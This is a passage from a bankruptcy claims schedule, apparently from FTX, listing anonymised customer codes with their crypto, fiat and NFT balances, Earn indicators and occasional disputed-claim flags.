| 07371557 | | USD[10.00] | | |
| 07371558 | | USD[10.00] | | |
| 07371559 | | BCH[0], BRZ[0], CUSDT[3], LINK[0], LTC[0], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371562 | | DOGE[0], ETH[0], ETHW[0.73980285], SHIB[0], TRX[0], USD[0.51] | Yes | |
| 07371563 | | USD[10.00] | | |
| 07371564 | | DOGE[5.06949852], GRT[0], LINK[0], MATIC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07371565 | | ETH[.00000001], USD[4.08] | | |
| 07371566 | | BRZ[1], BTC[.0203906], CUSDT[3], DOGE[7], ETH[.39771161], ETHW[.39771161], LINK[.15717225], SUSHI[.00000105], TRX[2465.75280701], USD[0.19], USDT[1] | | |
| 07371567 | | BF_POINT[300], MATIC[1097.89174128], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07371568 | | USD[10.00] | | |
| 07371569 | | BRZ[1], DOGE[.00002494], USD[0.01] | | |
| 07371570 | | USD[10.00] | | |
| 07371571 | | DOGE[.46592548], USD[1.49] | | |
| 07371573 | | USD[0.01] | | |
| 07371574 | | ETH[0], ETHW[0], LINK[0], LTC[0], SOL[0], USD[0.01] | Yes | |
| 07371575 | | USD[10.00] | | |
| 07371577 | | DOGE[16231.87081719], TRX[2], USD[0.00] | Yes | |
| 07371578 | | CUSDT[1], DOGE[3], GRT[154.93651268], SOL[0], TRX[3], USD[0.00] | | |
| 07371579 | | USD[0.00] | | |
| 07371580 | | CUSDT[1], DOGE[4.000548], SHIB[1], USD[682.63] | Yes | |
| 07371581 | | USD[10.00] | | |
| 07371582 | | BAT[1], BRZ[1], CUSDT[13], DOGE[4767.50639859], TRX[6], USD[0.00] | | |
| 07371583 | | USD[15.00] | | |
| 07371584 | | BAT[1343.307], BCH[1.948677], BTC[.0934065], ETH[1.567431], ETHW[1.567431], GRT[475.524], LINK[47.952], LTC[11.74824], TRX[5998.995], UNI[27.5724], USD[2611.21], USDT[8.42084875], YFI[.036953] | | |
| 07371585 | | CUSDT[8], DOGE[281.84961324], TRX[1.00547375], USD[0.00] | | |
| 07371586 | | USD[10.00] | | |
| 07371587 | | USD[10.00] | | |
| 07371589 | | DOGE[15000.572], SHIB[11000000], USD[0.90] | | |
| 07371591 | | DOGE[134.48287501], USD[0.00] | | |
| 07371593 | | USD[10.00] | | |
| 07371595 | | CUSDT[1], DOGE[430.03702282], EUR[1.79], USD[0.00] | Yes | |
| 07371596 | | GRT[.00678222], USD[10.00] | | |
| 07371597 | | BRZ[2], CUSDT[9], DOGE[1987.89796761], ETH[.10479487], ETHW[.10479487], GRT[.00004042], LINK[2.09258752], SHIB[1], TRX[609.72396496], USD[234.98], USDT[2] | | |
| 07371598 | | CUSDT[1], USD[0.01] | | |
| 07371599 | | USD[0.00], USDT[0] | | |
| 07371600 | | USD[10.00] | | |
| 07371601 | | AAVE[.00000403], ALGO[.00094601], AVAX[.00000612], BAT[.00100277], BTC[.00002255], DOGE[.0711812], ETH[.0000314], ETHW[.0000314], FTX_EQUITY[0], GRT[.00109174], LINK[.0000305], MKR[.0000004], NEAR[.00002447], NFT [339639444423226741/Humpty Dumpty #58][1], NFT [357124143059491373/Serum Surfers X Crypto Bahamas #145][1], NFT [373795654757287036/FTX - Off The Grid Miami #6025][1], NFT [386913493893200335/Resilience #59][1], NFT [526199560021274176/Australia Ticket Stub #1544][1], NFT [565515285046502455/Astro Stones #43][1], PAXG[.00000161], SHIB[8.56877659], SOL[.00006228], SUSHI[.00006099], TRX[.01219823], UNI[.00002443], USD[0.00], WEST_REALM_EQUITY_POSTSPLIT[0], YFI[.00000008] | | |
| 07371602 | | DOGE[190.70216345], USD[0.00] | | |
| 07371603 | | BTC[0], ETH[.00000001], ETHW[0], LTC[0], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07371604 | | CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07371605 | | DOGE[477.13031244], SOL[1.47378707], SUSHI[1.3089164], USD[0.00] | | |
| 07371606 | | USD[10.00] | | |
| 07371607 | | USD[1.28] | | |
| 07371608 | | CUSDT[1], DOGE[16.04437706], GRT[4.91443259], USD[0.00] | | |
| 07371609 | | BTC[.00012131], DOGE[52.96056085], USD[0.00] | | |
| 07371610 | | USD[10.00] | | |
| 07371611 | | AAVE[1.02195204], BAT[93.56395538], BTC[.00205653], CUSDT[3], DOGE[5368.42205381], GRT[25.08059819], LINK[6.37545253], LTC[1.01731428], MATIC[89.9287815], NFT [429713129349056514/Saudi Arabia Ticket Stub #2287][1], NFT [546787936215805784/FTX - Off The Grid Miami #1044][1], SOL[34.0365393 1], SUSHI[2.07413449], TRX[4719.09868504], UNI[2.14778191], USD[0.00] | | |
| 07371612 | | BAT[1], BRZ[1], CUSDT[2], TRX[3], USD[0.01], USDT[1] | | |
| 07371613 | | USD[10.00] | | |
| 07371615 | | USD[10.00] | | |
| 07371616 | | BTC[0], CUSDT[20.75167202], DOGE[0], USD[0.00] | | |
| 07371617 | | DOGE[6055.96136405], USD[0.00] | | |
| 07371618 | | BAT[29.78804775], BCH[0.04900636], CUSDT[37.10965129], DOGE[152.34684773], ETH[.05193681], ETHW[.05193681], SHIB[752899.65984038], TRX[169.46192524], USD[2.10], USDT[0] | | |
| 07371620 | | USD[0.00] | | |
| 07371621 | | BTC[0], USD[0.71], USDT[2.832] | | |
| 07371623 | | USD[10.00] | | |
| 07371624 | | USD[10.00] | | |
| 07371625 | | BTC[0], ETH[0], ETHW[0.00007760], SHIB[1], SOL[0], USD[1243.34], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371626 | | BAT[1], BRZ[4], CUSDT[6], DOGE[3], ETH[.00013312], ETHW[.00013312], USD[0.00] | | |
| 07371627 | | BRZ[1], CUSDT[7], DOGE[1061.98766651], TRX[1575.00431073], USD[0.00] | | |
| 07371628 | | BRZ[1], CUSDT[10], DOGE[1], GRT[6.07429955], SHIB[6], SOL[11.39224778], TRX[253.04154222], USD[31.09] | | |
| 07371629 | | BRZ[1], CUSDT[5], DOGE[2], LINK[.00003473], SOL[3.98317476], TRX[2], USD[0.00] | Yes | |
| 07371630 | | BTC[0.00001067], ETH[.00000001], LINK[.086], SOL[.00527202], USD[0.00] | | |
| 07371631 | | USD[10.00] | | |
| 07371632 | | CUSDT[2], DOGE[5], SHIB[3], TRX[1], USD[0.01] | Yes | |
| 07371633 | | BAT[0.00001525], BTC[0.00000002], CUSDT[1], DOGE[0.24570925], LINK[0.00014097], PAXG[0], SHIB[156941.56260521], TRX[2], USD[0.08] | Yes | |
| 07371634 | | USD[10.00] | | |
| 07371635 | | BAT[3.49935115], BRZ[1], CUSDT[1], DOGE[3], TRX[9], USD[0.00] | | |
| 07371636 | | BTC[0], DAI[0], DOGE[0], LTC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07371637 | | USD[10.00] | | |
| 07371638 | | USD[10.00] | | |
| 07371639 | | BRZ[2], CUSDT[1], DOGE[2], ETH[.0643862], ETHW[.06358719], SUSHI[.7220114], USD[0.00], USDT[1.09002479] | Yes | |
| 07371640 | | USD[10.00] | | |
| 07371643 | | BAT[1], TRX[.00002409], USD[0.00] | | |
| 07371645 | | ETH[0], ETHW[0], SOL[0.00274177], USD[0.00], USDT[0] | | |
| 07371646 | | DOGE[1072.66559173], USD[10.00] | | |
| 07371647 | | USD[0.00] | Yes | |
| 07371648 | | USD[10.00] | | |
| 07371649 | | SUSHI[.35647337], USD[0.86], USDT[0] | | |
| 07371650 | | USD[10.00] | | |
| 07371652 | | USD[10.00] | | |
| 07371654 | | USD[10.00] | | |
| 07371655 | | USD[0.00] | Yes | |
| 07371657 | | ETH[.907092], ETHW[.907092], USD[895.89] | | |
| 07371658 | | BAT[12.45134078], USD[0.00] | | |
| 07371659 | | DOGE[18.17707297], USD[0.00] | | |
| 07371660 | | USD[10.00] | | |
| 07371663 | | DOGE[1], ETH[0], USD[0.00] | | |
| 07371664 | | USD[10.00] | | |
| 07371665 | Contingent, Disputed | BAT[13.11299927], DOGE[207.48636375], ETH[.00462996], ETHW[.00462996], GRT[.0000476], TRX[137.0630191], USD[0.00] | | |
| 07371666 | | CUSDT[1], DOGE[586.83414573], USD[0.00] | Yes | |
| 07371667 | | ETH[.00324496], ETHW[.00320389], USD[0.00] | Yes | |
| 07371668 | | ETH[0], KSHIB[0], TRX[5520.15415606], USD[1463.43] | Yes | |
| 07371670 | | CUSDT[4], DOGE[58.54818886], ETH[.00851313], ETHW[.00840361], USD[0.00] | Yes | |
| 07371671 | | GRT[4.63042216], USD[0.00] | Yes | |
| 07371672 | | USD[10.00] | | |
| 07371674 | | BTC[.00017257], DOGE[3], TRX[.0000377], USD[0.01] | | |
| 07371676 | | USD[10.00] | | |
| 07371677 | | AUD[0.43], TRX[2], USD[0.58] | | |
| 07371678 | | DOGE[1.74080563], USD[0.00] | | |
| 07371679 | | USD[10.00] | | |
| 07371683 | | USD[10.00] | | |
| 07371685 | | USD[0.62] | | |
| 07371686 | | USD[10.00] | | |
| 07371687 | | BTC[.00006085], ETH[.00000001], ETHW[0], USD[4.73] | | |
| 07371688 | | DOGE[1725.54855199], USD[0.00] | | |
| 07371689 | | USD[10.00] | | |
| 07371690 | | USD[10.00] | | |
| 07371691 | | BCH[0], BTC[0], GRT[15.9848], SHIB[15500000], SOL[4.7055255], USD[1.38] | | |
| 07371692 | | USD[0.14] | | |
| 07371693 | | USD[10.00] | | |
| 07371694 | | BTC[0.00014602], SUSHI[200.112], USD[1.40], WBTC[.0216783], YFI[.007968] | | |
| 07371695 | | DOGE[138.43443938], USD[0.00] | | |
| 07371696 | | USD[10.00] | | |
| 07371698 | | USD[10.00] | | |
| 07371700 | | BTC[0], CUSDT[7], ETH[3.63710747], ETHW[3.63557992], TRX[11.18276187], UNI[347.81908831], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371701 | | MATIC[6.51859185], USD[0.00] | Yes | |
| 07371702 | | USD[10.00] | | |
| 07371703 | | USD[10.00] | | |
| 07371704 | | USD[10.00] | | |
| 07371705 | | BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07371706 | | USD[10.00] | | |
| 07371707 | | CUSDT[2], DOGE[.00006414], USD[2.88] | | |
| 07371708 | | USD[0.00] | | |
| 07371711 | | USD[0.01] | | |
| 07371713 | | CUSDT[2], DOGE[2053.36209466], ETH[.1273835], ETHW[.1273835], LTC[.56255869], SUSHI[6.65941286], TRX[1], USD[0.00] | | |
| 07371714 | | USD[0.00] | | |
| 07371715 | | BRZ[1], CUSDT[11], DOGE[1], LINK[35.32639979], TRX[5], USD[0.01], USDT[1.10120093] | Yes | |
| 07371716 | | DOGE[1], USD[0.00] | Yes | |
| 07371717 | | BTC[0], DOGE[.9388], LINK[.08811653], MATIC[3.924], SOL[.008876], SUSHI[.00000001], USD[0.01], USDT[0], WBTC[0] | | |
| 07371719 | | CUSDT[1], DOGE[2], USD[0.01] | | |
| 07371720 | | USD[10.00] | | |
| 07371721 | | USD[10.00] | | |
| 07371722 | | USD[10.00] | | |
| 07371725 | | BAT[0], DOGE[0], GRT[20.34722261], MATIC[0], TRX[0], USD[0.00] | Yes | |
| 07371726 | | USD[10.00] | | |
| 07371727 | | ETH[4.11508695], ETHW[4.11508695], SOL[366.551445], USD[5771.46] | | |
| 07371728 | | USD[10.00] | | |
| 07371729 | | USD[10.00] | | |
| 07371730 | | BAT[8.97252533], BCH[.09216997], CUSDT[4], DOGE[2931.38493416], ETH[.02563786], ETHW[.02532322], SHIB[780100.33369497], TRX[693.93768593], USD[0.00] | Yes | |
| 07371732 | | DOGE[164.5415576], USD[0.00] | | |
| 07371733 | | GRT[.00264234], USD[0.00] | | |
| 07371734 | | BTC[0], DOGE[0], GRT[0], SOL[0], YFI[0] | | |
| 07371735 | | USD[10.00] | | |
| 07371736 | | BTC[.00017448], CUSDT[11], SHIB[694072.01282755], SUSHI[1.84143397], TRX[2], USD[0.01] | Yes | |
| 07371737 | | USD[10.00] | | |
| 07371739 | | USD[10.00] | | |
| 07371740 | | USD[10.00] | | |
| 07371741 | | BTC[.0005] | | |
| 07371742 | | DOGE[.29], ETH[.00023075], ETHW[.00023075], USD[9.24] | | |
| 07371743 | | BRZ[1], CUSDT[6], USD[0.00] | Yes | |
| 07371744 | | USD[10.00] | | |
| 07371745 | | GRT[4.63236534], USD[0.00] | | |
| 07371746 | | USD[10.00] | | |
| 07371747 | | USD[10.00] | | |
| 07371748 | | USD[10.00] | | |
| 07371749 | | USD[10.00] | | |
| 07371751 | | BRZ[1], CUSDT[3], TRX[2], USD[0.21] | Yes | |
| 07371752 | | DAI[9.91632446], USD[0.00] | | |
| 07371753 | | BTC[0.00000491], USD[0.01] | | |
| 07371754 | | ALGO[.00662107], DOGE[0], ETH[0.00007116], ETHW[0.00007116], SHIB[5], USD[0.00], USDT[0] | Yes | |
| 07371756 | | USD[10.00] | | |
| 07371757 | | CUSDT[1], DOGE[2], TRX[0], USD[0.00] | | |
| 07371758 | | NFT [394693270312723312/Toasty Turts #1673][1], USD[13.88] | | |
| 07371759 | | CUSDT[0], USD[86.56], USDT[0] | Yes | |
| 07371760 | | USD[10.00] | | |
| 07371762 | | USD[10.00] | | |
| 07371765 | | USD[10.00] | | |
| 07371766 | | USD[10.00] | | |
| 07371767 | | USD[10.00] | | |
| 07371768 | | USD[10.00] | | |
| 07371769 | | DOGE[138.51263569], USD[0.00] | | |
| 07371770 | | USD[10.00] | | |
| 07371772 | | BTC[0.04537308], DOGE[.3255], ETH[.03731152], ETHW[.00031152], SOL[100.00657565], USD[0.14] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371773 | | TRX[92.50241049], UNI[.2527313], USD[0.00] | Yes | |
| 07371774 | | USD[10.00] | | |
| 07371776 | | CUSDT[1], DOGE[112.88040134], ETH[.03556967], ETHW[.03513191], TRX[234.93583398], USD[0.00] | Yes | |
| 07371777 | | DAI[0], TRX[1.00083517], USD[0.00] | | |
| 07371779 | | BAT[2], BRZ[1], BTC[0], CUSDT[1], TRX[1], USD[0.10], USDT[0] | | |
| 07371780 | | USD[0.00] | | |
| 07371782 | | USD[10.00] | | |
| 07371783 | | GRT[0], SOL[0], UNI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07371784 | | USD[10.00] | | |
| 07371785 | | BAT[10680.38338452], BCH[3.84224804], BRZ[0], CUSDT[9], DOGE[2], GRT[1.00420815], NFT (358259945825165212/Ravager #1864)[1], NFT (378354928407548432/Baddies #2338)[1], NFT (431123646513698600/Ravager #1735)[1], NFT (509218969466472704/Ravager #1791)[1], NFT (512933360046697695/Ravager #86)[1], NFT (522225522258128515/Ravager #164)[1], NFT (529319933516240502/Baddies #2378)[1], NFT (555155870678296162/Ravager #1609)[1], NFT (569484445695629284/Bahrain Ticket Stub #185)[1], SOL[0.13208645], USD[8.30], USDT[0.00000002] | Yes | |
| 07371786 | | USD[11.07] | Yes | |
| 07371787 | | DOGE[0], SHIB[1169.61392337], USD[0.00], USDT[0] | Yes | |
| 07371789 | | USD[0.00], USDT[0] | | |
| 07371790 | | GRT[10.67457551], USD[0.00] | Yes | |
| 07371792 | | CUSDT[1], TRX[85.81059216], USD[0.00] | | |
| 07371793 | | USD[0.00] | | |
| 07371795 | | USD[0.00] | | |
| 07371796 | | USD[0.00] | | |
| 07371797 | | USD[0.00] | | |
| 07371799 | | USD[0.00] | | |
| 07371800 | | USD[0.00] | | |
| 07371801 | | USD[10.00] | | |
| 07371802 | | BTC[.00105125], DOGE[615.32317015], USD[0.00] | | |
| 07371803 | | USD[10.00] | | |
| 07371804 | | BAT[0], BRZ[0], DOGE[1.09436541], GRT[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07371806 | | USD[10.00] | | |
| 07371807 | | USD[10.00] | | |
| 07371808 | | USD[0.00] | Yes | |
| 07371809 | | DOGE[45.01542169], SHIB[466018.01068562], USD[0.00] | Yes | |
| 07371810 | Contingent, Disputed | TRX[1], USD[0.00] | Yes | |
| 07371811 | | AUD[0.00], BAT[0.88526719], BCH[0], BRZ[0.00000079], BTC[0], CAD[0.00], DOGE[1], ETH[0.00037937], ETHW[0.00037937], EUR[0.00], GBP[0.00], GRT[0], LINK[.02272776], LTC[0], PAXG[0], SGD[2.94], SOL[0], SUSHI[0], TRX[.00000079], UNI[0], USD[0.00], USDT[1.68336172], YFI[0.00004569] | | |
| 07371812 | | BF_POINT[300], BRZ[2], BTC[0.00002510], CUSDT[13], DOGE[4], ETH[.08722677], ETHW[.08620234], TRX[2], USD[0.01], USDT[1.09513354] | Yes | |
| 07371813 | | USD[10.00] | | |
| 07371814 | | BAT[1], BTC[.06523031], CUSDT[1], DOGE[5336.91634283], GRT[3], LINK[1.0410302], SOL[191.28024003], TRX[3], USD[0.00], USDT[1.02540926] | Yes | |
| 07371816 | | BRZ[60.04286784], TRX[73014.73773291], USD[0.00] | Yes | |
| 07371817 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], MKR[0], PAXG[0], SHIB[5087.11391001], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07371818 | | USD[10.00] | | |
| 07371819 | | USD[10.00] | | |
| 07371820 | | DOGE[1], ETH[0], GRT[5.43867590], LINK[0], USD[0.00] | Yes | |
| 07371821 | | USD[0.00] | Yes | |
| 07371822 | | USD[0.00] | | |
| 07371823 | | SOL[1.08742163], TRX[1], USD[0.00] | | |
| 07371824 | | BTC[.00214694], CUSDT[1], DOGE[1882.55601381], ETH[.0116039], ETHW[.0116039], TRX[1], USD[0.00] | | |
| 07371825 | | DOGE[272.44111706], USD[0.00] | Yes | |
| 07371830 | | SOL[0] | | |
| 07371831 | | BAT[0], BTC[0], DOGE[0], ETH[0], GRT[0], PAXG[0], SUSHI[0], USD[0.69], USDT[0] | | |
| 07371832 | | USD[10.00] | | |
| 07371834 | | ETH[.01793065], ETHW[.01793065], SOL[0.40878732], USDT[2.98301929] | | |
| 07371835 | | DOGE[.17909871], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07371836 | | TRX[162.05309604], USD[0.00] | | |
| 07371839 | | USD[0.00] | | |
| 07371840 | | USD[0.00] | | |
| 07371841 | | BTC[.00201518], CUSDT[3], DOGE[1], USD[0.00] | | |
| 07371842 | | BTC[0.00000120], ETH[4.697426], ETHW[.00068608], USD[0.00], WBTC[0] | | |
| 07371843 | | USD[10.03] | Yes | |
| 07371844 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371848 | | DOGE[197.85142321], USD[0.00] | Yes | |
| 07371849 | | USD[10.00] | | |
| 07371850 | | USD[10.00] | | |
| 07371851 | | USD[10.00] | | |
| 07371853 | | USD[10.00] | | |
| 07371856 | | CUSDT[1], DOGE[3393.04789045], USD[10.00] | | |
| 07371857 | | BAT[1268.73], BTC[0.05722390], ETH[.983252], ETHW[.983252], LINK[11.6883], MATIC[239.76], SUSHI[.461], USD[0.98], USDT[2.6934744] | | |
| 07371859 | | CUSDT[3], ETH[.00303148], ETHW[.00299041], SOL[.09046364], USD[0.00] | Yes | |
| 07371860 | | BTC[.00020347], USD[0.00] | | |
| 07371862 | | USD[10.00] | | |
| 07371863 | | BTC[0], DOGE[0], LTC[0], TRX[0], USD[0.34] | | |
| 07371864 | | DOGE[1], TRX[204.14054178], USD[0.00] | | |
| 07371865 | | CUSDT[10], DOGE[752.05400583], ETH[.01338603], ETHW[.01338603], TRX[2], USD[0.00] | | |
| 07371867 | | USD[10.00] | | |
| 07371869 | | USD[10.00] | | |
| 07371870 | | USD[10.00] | | |
| 07371871 | | BTC[0], DOGE[3325.30834752], SOL[33.23727188], USDT[.336425] | | |
| 07371872 | | USD[10.00] | | |
| 07371873 | | TRX[.000002], USD[0.00], USDT[.72348594] | | |
| 07371875 | | GRT[0], USD[0.00] | | |
| 07371876 | | USD[10.00] | | |
| 07371877 | | DOGE[0], LTC[0], USD[4.99] | | |
| 07371878 | | USD[10.00] | | |
| 07371879 | | USD[0.00] | | |
| 07371881 | | USD[10.00] | | |
| 07371882 | | USD[10.00] | | |
| 07371884 | | CUSDT[1], USD[0.01] | | |
| 07371886 | | USD[10.00] | | |
| 07371887 | | USD[10.00] | | |
| 07371888 | | BAT[53.5472939], TRX[1], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |
| 07371890 | | USD[10.00] | | |
| 07371891 | | CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07371892 | | BRZ[1], CUSDT[2], DOGE[2], TRX[1], USD[0.34], USDT[0] | | |
| 07371894 | | BAT[40.11381856], CUSDT[3], DOGE[4.02061908], LINK[.64579307], SOL[3.85040558], TRX[675.61655799], USD[0.00], YFI[.00022304] | Yes | |
| 07371896 | | DOGE[795.43013496], USD[0.00] | Yes | |
| 07371897 | | USD[10.00] | | |
| 07371898 | | BAT[4.40207096], BRZ[8.79801969], BTC[.00139516], CUSDT[44], DOGE[4], ETH[.00523343], ETHW[.00516498], GRT[1.00367791], SHIB[1822546.73805477], SUSHI[1.1064131], USD[0.00], USDT[2.19830968] | Yes | |
| 07371899 | | USD[10.00] | | |
| 07371901 | | USD[10.00] | | |
| 07371902 | | BRZ[1], CUSDT[5], TRX[4], USD[0.00], USDT[0] | | |
| 07371903 | | BAT[.9334], DOGE[.382], ETH[.000567], ETHW[.000567], GRT[1225.3514], LTC[.00465], TRX[.553], UNI[.0464], USD[17.03] | | |
| 07371904 | | CUSDT[5], DOGE[1495.78346478], SHIB[809910.02079111], USD[0.09] | Yes | |
| 07371905 | | USD[0.00] | | |
| 07371907 | | DOGE[129.84566155], USD[0.00] | | |
| 07371908 | | BAT[1], BRZ[2], CUSDT[1], DOGE[306.9321231], GRT[1], SUSHI[1], TRX[5], UNI[2], USD[0.01], USDT[1] | | |
| 07371909 | | USD[10.00] | | |
| 07371911 | | USD[10.00] | | |
| 07371912 | | DOGE[0], ETH[.00000001], ETHW[0], UNI[2.12128504] | | |
| 07371913 | | USD[10.00] | | |
| 07371915 | | BTC[.00021224], DOGE[1820.72262695], USD[0.00] | | |
| 07371917 | | USD[10.00] | | |
| 07371919 | | USD[10.00] | | |
| 07371921 | | BRZ[21.51124778], BTC[0], CUSDT[2], DOGE[0], ETH[0], ETHW[0], GRT[0], SUSHI[0], TRX[4], USD[0.00], USDT[1.10746373] | Yes | |
| 07371922 | | USD[10.00] | | |
| 07371923 | | ETH[0] | | |
| 07371924 | | USD[10.00] | | |
| 07371925 | | DOGE[1179.33568292], USD[0.00] | | |
| 07371926 | | ETH[.04049561], ETHW[.04049561], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371928 | | NFT [4927828116384851 58/Coachella x FTX Weekend 1 #22119]:[1] | | |
| 07371929 | | BAT[6.56018895], DOGE[.00002353], USD[0.25] | | |
| 07371930 | | USD[10.00] | | |
| 07371933 | | BTC[.00360082], SHIB[.00000001], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07371934 | | DOGE[2120.97037446], USD[0.13] | Yes | |
| 07371936 | | USD[10.00] | | |
| 07371937 | | CUSDT[0], DAI[0], DOGE[0], EUR[0.00], GBP[0.00], LINK[0], MATIC[0], SOL[0], SUSHI[0], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07371939 | | USD[10.00] | | |
| 07371940 | | BAT[0], USD[0.00] | | |
| 07371941 | | USD[10.00] | | |
| 07371942 | | BAT[0], DOGE[2.0007846], GRT[1], USD[0.01] | | |
| 07371943 | | USD[10.00] | | |
| 07371944 | | USD[10.00] | | |
| 07371945 | | BTC[.00127983], CUSDT[1], DOGE[3330.00710057], USD[0.00] | | |
| 07371946 | | CUSDT[1], LTC[.03159366], USD[0.00] | | |
| 07371947 | | DOGE[1], GRT[0], USD[0.00] | | |
| 07371949 | | AVAX[.04665628], USD[0.00] | Yes | |
| 07371952 | | DAI[.89266253], USD[0.00] | | |
| 07371953 | | USD[10.00] | | |
| 07371954 | | BCH[.08364885], BRZ[1], DOGE[4], ETH[.00068437], ETHW[.00068437], GRT[1], TRX[3], USD[15.59], USDT[1.99480502] | | |
| 07371955 | | USD[10.00] | | |
| 07371956 | | DOGE[1], USD[0.72] | | |
| 07371958 | | USD[10.00] | | |
| 07371961 | | BTC[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07371962 | | USD[10.00] | | |
| 07371963 | | USD[10.00] | | |
| 07371964 | | ETH[.00000047], ETHW[.00000047], EUR[0.00], USD[0.00] | | |
| 07371965 | | GRT[4.45038915], USD[0.00] | | |
| 07371966 | | USD[10.00] | | |
| 07371967 | | USD[10.00] | | |
| 07371969 | | USD[0.00] | | |
| 07371971 | | DOGE[1], USD[0.00] | | |
| 07371972 | | CUSDT[2], DOGE[1], TRX[1], USD[0.01], USDT[0] | | |
| 07371975 | | CUSDT[1], USD[0.01] | | |
| 07371976 | | BTC[0], USD[0.00] | | |
| 07371977 | | USD[10.00] | | |
| 07371979 | | USD[0.00] | | |
| 07371981 | | SOL[.066], USD[0.00], USDT[0] | | |
| 07371983 | | USD[10.00] | | |
| 07371984 | | USD[10.00] | | |
| 07371985 | | USD[10.00] | | |
| 07371986 | | USD[10.00] | | |
| 07371987 | | CUSDT[2], DOGE[27.37208110], GRT[.00076033], LINK[1.04757244], SUSHI[1.50487415], TRX[1291.23093973], UNI[1.04587293], USD[0.00], USDT[0.00527381] | | |
| 07371988 | | BTC[.00488367], CUSDT[1], DOGE[138.14440256], TRX[1], USD[0.00] | | |
| 07371991 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07371992 | | DOGE[.18271023], TRX[4], USD[40.84] | | |
| 07371993 | | BTC[0], DOGE[9.62005943], ETH[0], LINK[0], SHIB[0], USD[0.00], USDT[0.00000457] | | |
| 07371995 | | TRX[.000001], USD[0.00] | | |
| 07371998 | | CUSDT[1], LINK[3.90682538], USD[10.00] | | |
| 07371999 | | BAT[4], BRZ[3], CUSDT[5], DOGE[203213.60062364], GRT[6], SOL[1], TRX[4], USD[5241.48], USDT[4] | | |
| 07372000 | | BRZ[1], CUSDT[2], DOGE[1.00003542], LTC[.04376046], USD[0.74] | | |
| 07372003 | | BRZ[2], CUSDT[6], DOGE[2], KSHIB[201.77700976], TRX[2], USD[0.77] | Yes | |
| 07372004 | | CUSDT[1], DOGE[12574.933267], TRX[1], USD[0.00] | | |
| 07372005 | | USD[10.00] | | |
| 07372007 | | USD[10.00] | | |
| 07372008 | | CUSDT[1], DOGE[1], USD[10.52] | | |
| 07372010 | | USD[0.00] | | |
| 07372011 | | BTC[.00021233], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372017 | Contingent, Disputed | BAT[.2620134], BRZ[1], BTC[0], CUSDT[9], DOGE[56777.31185516], ETH[.25858857], ETHW[.25839505], MATIC[117.93348183], SHIB[3], TRX[3], USD[7.76], USDT[0] | Yes | |
| 07372018 | | USD[10.00] | | |
| 07372021 | | ETH[.00015739], ETHW[.00015739], USD[0.00] | Yes | |
| 07372022 | | USD[10.00] | | |
| 07372023 | | BRZ[2], DOGE[3], SHIB[1], USD[0.01], USDT[0] | | |
| 07372026 | | USD[0.00] | | |
| 07372027 | | BRZ[1], BTC[.14042861], DOGE[1], ETH[1.14496768], ETHW[1.14496768], USD[10.00] | | |
| 07372028 | | CUSDT[3], DAI[49.57174129], DOGE[138.11178131], GRT[1], TRX[1], USD[50.01] | | |
| 07372031 | | BRZ[1], ETH[.07805214], ETHW[.07805214], USD[10.00] | | |
| 07372032 | | BAT[1], BRZ[4], CUSDT[9], DOGE[1.00003315], GRT[5], SOL[0], TRX[2], USD[0.00], USDT[1] | | |
| 07372034 | | TRX[99.89638746], USD[0.00] | | |
| 07372035 | | USD[0.01] | | |
| 07372036 | | USD[0.00] | | |
| 07372037 | | CUSDT[3], PAXG[0], SOL[.00001055], USD[0.01] | Yes | |
| 07372038 | | USD[10.00] | | |
| 07372041 | | BAT[1.01655549], CUSDT[1], DOGE[1], GRT[501.66626173], USD[0.00] | Yes | |
| 07372042 | | BRZ[1], SHIB[2], SOL[2.98600994], TRX[5], USD[0.00] | | |
| 07372043 | | USD[0.00] | | |
| 07372044 | | BRZ[2], CUSDT[3], USD[0.00], USDT[0] | | |
